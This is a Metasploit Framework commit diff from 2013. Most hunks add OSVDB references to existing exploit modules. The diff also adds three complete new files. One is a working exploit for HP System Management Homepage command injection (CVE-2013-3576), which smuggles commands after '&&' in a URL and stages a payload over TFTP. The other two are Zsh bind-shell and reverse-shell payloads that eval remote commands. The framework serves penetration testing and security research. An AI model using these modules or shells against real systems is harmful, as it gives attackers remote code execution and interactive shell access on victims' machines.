bug/bundler_fix
jvazquez-r7 2013-06-20 17:18:42 -05:00
commit 785639148c
16 changed files with 322 additions and 17 deletions

View File

@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2013-0422' ],
[ 'OSVDB', '89059' ],
[ 'US-CERT-VU', '625617' ],
[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],

View File

@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '77492' ],
[ 'URL', 'https://www.familycms.com/blog/2011/11/security-vulnerability-fcms-2-5-2-7-1/' ],
[ 'URL', 'http://sourceforge.net/apps/trac/fam-connections/ticket/407' ],
[ 'URL', 'http://rwx.biz.nf/advisories/fc_cms_rce_adv.html' ],

View File

@ -27,7 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ],
[ 'OSVDB', '94441' ],
[ 'URL', 'http://sourceforge.net/projects/freenas/files/stable/0.7.2/NOTES%200.7.2.5543.txt/download' ]
],
'Payload' =>
{

View File

@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ],
[ 'OSVDB', '78480' ],
[ 'URL', 'http://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce' ]
],
'Privileged' => false,
'Payload' =>

View File

@ -33,6 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2010-0738' ], # using a VERB other than GET/POST
[ 'OSVDB', '64171' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
],

View File

@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
[ 'OSVDB', '64171' ],
[ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],
[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ],
],

View File

@ -31,8 +31,9 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['EDB', '20422'],
['BID', '55399']
[ 'OSVDB', '85509' ],
[ 'EDB', '20422 '],
[ 'BID', '55399 ']
],
'Payload' =>
{

View File

@ -37,10 +37,11 @@ class Metasploit4 < Msf::Exploit::Remote
],
'References' =>
[
['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate)
['CVE', '2013-0209'],
['URL', 'http://www.sec-1.com/blog/?p=402'],
['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html']
[ 'CVE', '2012-6315' ], # superseded by CVE-2013-0209 (duplicate)
[ 'CVE', '2013-0209' ],
[ 'OSVDB', '89322' ],
[ 'URL', 'http://www.sec-1.com/blog/?p=402' ],
[ 'URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html' ]
],
'Arch' => ARCH_CMD,
'Payload' =>

View File

@ -22,7 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
'References' =>
[
[ 'CVE', '2012-5159' ],
[ 'OSVDB', '85739' ],
[ 'EDB', '21834' ],
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php' ]
],
'Privileged' => false,
'Payload' =>
{

View File

@ -38,8 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-0156'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156']
[ 'CVE', '2013-0156' ],
[ 'OSVDB', '89026' ],
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156' ]
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,

View File

@ -29,9 +29,9 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/']
#['OSVDB', ''],
#['EDB', ''],
[ 'OSVDB', '85446' ],
[ 'EDB', '20500' ],
[ 'URL', 'http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/' ]
],
'Payload' =>
{

View File

@ -39,9 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
['CVE', '2011-3230'],
['URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments'],
['URL', 'http://support.apple.com/kb/HT5000']
[ 'CVE', '2011-3230' ],
[ 'OSVDB', '76389' ],
[ 'URL', 'http://vttynotes.blogspot.com/2011/10/cve-2011-3230-launch-any-file-path-from.html#comments' ],
[ 'URL', 'http://support.apple.com/kb/HT5000' ]
],
'Payload' =>
{

View File

@ -31,6 +31,7 @@ class Metasploit4 < Msf::Exploit::Local
'References' =>
[
[ 'CVE', '2012-3485' ],
[ 'OSVDB', '84706' ],
[ 'EDB', '20443' ],
[ 'URL', 'http://blog.zx2c4.com/791' ]
],

View File

@ -0,0 +1,178 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "HP System Management Homepage JustGetSNMPQueue Command Injection",
'Description' => %q{
This module exploits a vulnerability found in HP System Management Homepage. By
supplying a specially crafted HTTP request, it is possible to control the
'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
which will be used in a exec() function. This results in arbitrary code execution
under the context of SYSTEM. Please note: In order for the exploit to work, the
victim must enable the 'tftp' command, which is the case by default for systems
such as Windows XP, 2003, etc.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Markus Wulftange',
'sinn3r' #Metasploit
],
'References' =>
[
['CVE', '2013-3576'],
['OSVDB', '94191'],
['US-CERT-VU', '735364']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => 'win',
'Targets' =>
[
['Windows', {}],
],
'Privileged' => false,
'DisclosureDate' => "Jun 11 2013",
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(2381),
# USERNAME/PASS may not be necessary, because the anonymous access is possible
OptString.new("USERNAME", [false, 'The username to authenticate as']),
OptString.new("PASSWORD", [false, 'The password to authenticate with'])
], self.class)
end
def peer
"#{rhost}:#{rport}"
end
def check
cookie = ''
if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
cookie = login
if cookie.empty?
print_error("#{peer} - Login failed")
return Exploit::CheckCode::Safe
else
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
end
end
sig = Rex::Text.rand_text_alpha(10)
cmd = Rex::Text.uri_encode("echo #{sig}")
uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo"
req_opts = {}
req_opts['uri'] = uri
if not cookie.empty?
browser_chk = 'HPSMH-browser-check=done for this session'
curl_loc = "curlocation-#{datastore['USERNAME']}="
req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}"
end
res = send_request_raw(req_opts)
if not res
print_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def login
username = datastore['USERNAME']
password = datastore['PASSWORD']
cookie = ''
res = send_request_cgi({
'method' => 'POST',
'uri' => '/proxy/ssllogin',
'vars_post' => {
'redirecturl' => '',
'redirectquerystring' => '',
'user' => username,
'password' => password
}
})
if not res
fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login")
end
# CpqElm-Login: success
if res.headers['CpqElm-Login'].to_s =~ /success/
cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
end
cookie
end
def setup_stager
execute_cmdstager({ :temp => '.'})
end
def execute_command(cmd, opts={})
# Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")
req_opts = {}
req_opts['uri'] = uri
if not @cookie.empty?
browser_chk = 'HPSMH-browser-check=done for this session'
curl_loc = "curlocation-#{datastore['USERNAME']}="
req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
end
print_status("#{peer} - Executing: #{cmd}")
res = send_request_raw(req_opts)
end
def exploit
@cookie = ''
if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
@cookie = login
if @cookie.empty?
fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
else
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
end
end
@uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
setup_stager
end
end

View File

@ -0,0 +1,62 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit4
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Bind TCP (via Zsh)',
'Description' => %q{
Listen for a connection and spawn a command shell via Zsh. Note: Although Zsh is
often available, please be aware it isn't usually installed by default.
},
'Author' =>
[
'Doug Prostko <dougtko[at]gmail.com>'
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'zsh',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
end
#
# Constructs the payload
#
def generate
return super + command_string
end
#
# Returns the command string to use for execution
#
def command_string
cmd = "zmodload zsh/net/tcp;"
cmd << "ztcp -l #{datastore['LPORT']};"
cmd << "ztcp -a $REPLY;"
cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
cmd << "ztcp -c"
cmd
end
end

View File

@ -0,0 +1,48 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Reverse TCP (via Zsh)',
'Description' => %q{
Connect back and create a command shell via Zsh. Note: Although Zsh is often
available, please be aware it isn't usually installed by default.
},
'Author' => 'Doug Prostko <dougtko[at]gmail.com>',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'zsh',
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
))
end
def generate
return super + command_string
end
def command_string
cmd = "zmodload zsh/net/tcp;"
cmd << "ztcp #{datastore['LHOST']} #{datastore['LPORT']};"
cmd << "while read -r cmd <&$REPLY;do eval ${cmd} >&$REPLY;done;"
cmd << "ztcp -c"
cmd
end
end